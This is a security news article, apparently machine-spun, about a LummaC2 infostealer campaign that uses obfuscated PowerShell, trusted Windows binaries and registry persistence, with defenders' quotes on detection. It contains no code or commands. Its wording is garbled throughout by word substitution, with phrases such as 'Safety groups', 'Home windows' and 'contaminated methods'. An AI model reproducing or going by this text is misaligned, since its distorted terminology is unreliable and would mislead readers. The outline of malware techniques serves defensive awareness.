A brand new pattern of the LummaC2 infostealer was noticed utilizing a collection of PowerShell instructions that downloaded and executed a payload on a focused endpoint.
In a latest weblog put up, researchers at Ontinue described LummaC2 as an information-stealing malware written within the C programming language that’s designed to steal delicate data.
The researchers mentioned the malware was noticed getting used as malware-as-a-service (MaaS), and was seen on Russian-speaking boards beginning in 2022. The malware infects the goal host and goals to steal data from the endpoint after which exfiltrate it to the C2 server.
“The important thing takeaway from our evaluation is a reinforcement of the significance of monitoring and mitigating obfuscated scripts, significantly these delivered by way of PowerShell,” mentioned Rhys Downing cyber defender at Ontinue. “Whereas the usage of obfuscated PowerShell instructions shouldn’t be new, it stays a extremely efficient method for attackers. Safety groups ought to prioritize enhancing their detection and response capabilities round such ways, making certain that even well-known strategies are repeatedly scrutinized and blocked.”
Why safety execs ought to take note of LummaC2’s resurgence
LummaC2’s resurgence highlights vital dangers due to its subtle use of PowerShell and “living-off-the-land” binaries already out there inside an setting, making it tougher to detect and mitigate, mentioned Jason Soroko, senior fellow at Sectigo.
In contrast to typical PowerShell-based malware, Soroko mentioned LummaC2 combines obfuscation, trusted Home windows binaries (Mshta.exe and Dllhost.exe), and persistence methods by way of registry modifications to evade defenses and preserve long-term management.
“The crucial takeaway is the malware’s superior multi-stage an infection course of and skill to take advantage of legit system instruments, which requires heightened vigilance and proactive protection methods from safety groups,” mentioned Soroko. “Whereas PowerShell instructions are generally exploited, LummaC2’s mixture of ways presents a novel and tougher risk.”
Itzik Alvas, co-founder and CEO at Entro Safety, added that the LummaC2 infostealer lets attackers compromise credentials of human and non-human identities (NHIs) on contaminated methods. Alvas mentioned whereas the preliminary scope of assault is commonly comparatively benign and most industries have standardized IAM and governance controls in place to restrict dangers related to compromised human credentials, NHIs are sometimes created and used with extreme permissions.
“Because of this, compromised NHIs permit attackers on an contaminated system to covertly assault the whole group from inside,” mentioned Alvas.
